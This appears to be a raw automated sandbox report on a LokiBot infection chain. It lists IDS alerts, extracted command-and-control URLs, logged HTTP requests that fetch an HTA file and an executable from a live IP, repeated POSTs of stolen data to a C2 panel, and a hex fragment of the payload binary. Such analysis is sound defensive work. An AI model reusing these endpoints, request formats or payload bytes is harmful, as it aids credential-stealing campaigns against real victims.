                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49224 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49224
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49240 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49240 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49215
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49240
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49230 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49230 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49230 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49230 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49230 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49217
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49230
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49232 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49232 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49232 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49232 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49232 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49232
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49237 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49172 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49172 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49172 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49237 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49237 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49237 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49237 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49172 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49172 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49172
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49237
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49216 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49216 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49216 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49216 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49216 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49216
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49218 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49218 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49218 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49218 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49218 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49218
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49244 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49244 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49244 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49244 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49244 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49244
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49191
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49193 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49193 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49193 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49193 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49193 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49193
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49200
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49220 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49220 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49220 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49220 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49220 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49220
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49235 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49235 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49235 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49235 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49235 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49235
                    Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                    Source: Malware configuration extractorURLs: 94.156.177.41/simple/five/fre.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 06:56:45 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Wed, 20 Nov 2024 01:04:28 GMTETag: "92a00-6274dbb521496"Accept-Ranges: bytesContent-Length: 600576Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 35 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 2e 27 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 07 09 00 00 20 00 00 00 08 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 1d 00 00 00 40 09 00 00 1e 00 00 00 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 28 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 27 09 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 36 00 00 0c 28 00 00 03 00 00 00 16 00 00 06 b4 5e 00 00 28 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 02 28 14 00 00 0a 02 03 7d 01 00 00 04 02 7b 01 00 00 04 72 01 00 00 70 20 d1 01 00 00 17 6f 35 00 00 06 02 7b 01 00 00 04 6f 37 00 00 06 26 2a 00 00 00 1b 30 03 00 1f 00 00 00 01 00 00 11 02 7b 01 00 00 04 03 04 6f 39 00 00 06 02 03 7d 02 00 00 04 17 0a de 05 26 16 0a de 00 06 2a 00 01 10 00 00 00 00 00 00 18 18 00 05 0a 00 00 02 1b 30 03 00 74 00 00 00 02 00 00 11 05 6f 15 00 00 0a 02 7b 01 00 00 04 02 7b 02 00 00 04 72 1f 00 00 70 28 16 00 00 0a 6f 3a 00 00 06 03 0a 16 0b 2b 25 06 07 9a 0c 02 7b 01 00 00 04 08 6f 17 00 00 0a 6f 3b 00 00 06 05 08 6f 18 00 00 0a de 03 26 de 00 07 17 58 0b 07 06 8e 69 32 d5 02 7b 01 00 00 04 04 6f 3c 00 00 06 17 0d de 10 26 02 7b 01 00 00 04 6f 3d 00 00 06 16 0d de 00 09 2a 01 1c 00 00 00 00 2b 00 1a 45 00 03 0a 00 00 02 00 00 06 00 5c 62 00 10 0a 00 00 02 32 02 7b 01 00 00 04 6f 41 00 00 06 2a 6e 02 28 19 00 00 0a 02 03 7d 03 00 00 04 02
                    Source: Joe Sandbox ViewIP Address: 192.3.243.136 192.3.243.136
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49184 -> 192.3.243.136:80
                    Source: global trafficHTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.136Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.243.136If-Range: "2c850-6274dfb369376"
                    Source: global trafficHTTP traffic detected: GET /55/caspol.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.136Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 176Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 176Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 20 Nov 2024 01:22:20 GMTConnection: Keep-AliveHost: 192.3.243.136If-None-Match: "2c850-6274dfb369376"
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
